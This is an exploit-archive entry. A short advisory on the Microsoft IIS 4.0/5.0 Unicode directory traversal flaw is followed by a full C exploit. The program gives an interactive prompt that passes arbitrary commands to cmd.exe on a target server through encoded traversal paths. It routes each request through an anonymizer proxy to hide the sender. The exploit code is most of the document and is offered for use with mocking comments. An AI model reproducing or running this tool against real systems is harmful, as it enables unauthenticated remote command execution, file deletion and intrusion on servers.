// source: https://www.securityfocus.com/bid/1806/info Microsoft IIS 4.0 and 5.0 are both vulnerable to double dot "../" directory traversal exploitation if extended UNICODE character representations are used in substitution for "/" and "\". Unauthenticated users may access any known file in the context of the IUSR_machinename account. The IUSR_machinename account is a member of the Everyone and Users groups by default, therefore, any file on the same logical drive as any web-accessible file that is accessible to these groups can be deleted, modified, or executed. Successful exploitation would yield the same privileges as a user who could successfully log onto the system to a remote user possessing no credentials whatsoever. It has been discovered that a Windows 98 host running Microsoft Personal Web Server is also subject to this vulnerability. (March 18, 2001) This is the vulnerability exploited by the Code Blue Worm. **UPDATE**: It is believed that an aggressive worm may be in the wild that actively exploits this vulnerability. /* hack IIS 4.0/5.0 with the usefull UNICODE :) and have fun */ /* coded by zipo */ /* to compile: cc -o iisuni iisuni.c */ /* made for all the lame populus :) */ #include #include #include #include #include #include #define BUFF_LEN 6000 #define HTTP " HTTP/1.0\r\n\r\n" #define GET "GET http://" /* this is the anonymous server used */ #define ANON "anon.free.anonymizer.com" /* this are all the types of bugs */ #define BUG1_STR "/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+" #define BUG2_STR "/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+" #define BUG3_STR "/iisadmpwd/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+" #define BUG4_STR "/" /* this is the IIS http server port */ #define HTTP_PORT 80 int main (int argc, char *argv[]) { struct sockaddr_in sin; struct hostent *he; char *bug,cmd[BUFF_LEN],recbuffer[BUFF_LEN],buffer[BUFF_LEN]; int sck, i; if (argc < 3) bad_params (argv[0]); switch (atoi(argv[2])) { case 1: bug = BUG1_STR; break; case 2: bug = BUG2_STR; break; case 3: bug = BUG3_STR; break; case 4: bug = BUG4_STR; break; default: printf ("Number error\n"); exit(1); } while (1) { printf ("bash# "); fgets (cmd, sizeof(cmd), stdin); cmd[strlen(cmd)-1] = '\0'; if (strcmp(cmd, "exit")) { if (!strcmp(cmd, "clear")) { system("clear"); continue; } else if (!strcmp(cmd, "")) { continue; } else if (!strcmp(cmd, "?")) { printf ("Just you need to type in the prompt the M$DOS command\n"); printf ("to exit type \"exit\" :)\n"); continue; } /* prepare the string to be sent */ for (i=0;i<=strlen(cmd);i++) { if (cmd[i] == 0x20) cmd[i] = 0x2b; } sprintf (buffer, "%s%s%s%s%s", GET, argv[1], bug, cmd, HTTP); /* get ip */ if ((he = gethostbyname (ANON)) == NULL) { herror ("host error"); exit (1); } /* setup port and other parameters */ sin.sin_port = htons (HTTP_PORT); sin.sin_family = AF_INET; memcpy (&sin.sin_addr.s_addr, he->h_addr, he->h_length); /* create a socket */ if ((sck = socket (AF_INET, SOCK_STREAM, 6)) < 0) { perror ("socket() error"); exit (1); } /* connect to the sucker */ if ((connect (sck, (struct sockaddr *) &sin, sizeof (sin))) < 0) { perror ("connect() error"); exit (1); } /* send the beautifull string */ write (sck, buffer, sizeof(buffer)); /* recive all ! :) */ read (sck, recbuffer, sizeof(recbuffer)); /* and print it */ recbuffer[strlen(recbuffer)-1]='\0'; printf ("\033[0;7m-------------------------------------Received-------------------- ---------------\n"); printf ("%s\n---------------------------------------Done--------------------------- ----------\n\033[7;0m", recbuffer); /* close the socket ... not needed any more */ close (sck); /* put zero's in the buffers */ bzero (buffer, sizeof(buffer)); bzero (recbuffer, sizeof(recbuffer)); } else { /* you type "exit" cya :) */ exit(0); } } } /* you miss a parameter :'-( */ int bad_params (char *prog_name) { fprintf (stdout, "usage:\n\t%s \n", prog_name); fprintf (stdout, "-------------------------------------------------------\n"); fprintf (stdout, "<1> msadc\t"); fprintf (stdout, "<2> scripts\t"); fprintf (stdout, "<3> iisadmpwd\t"); fprintf (stdout, "<4> /\n"); fprintf (stdout, "-------------------------------------------------------\n"); exit (1); } /* EOF */

Query Builder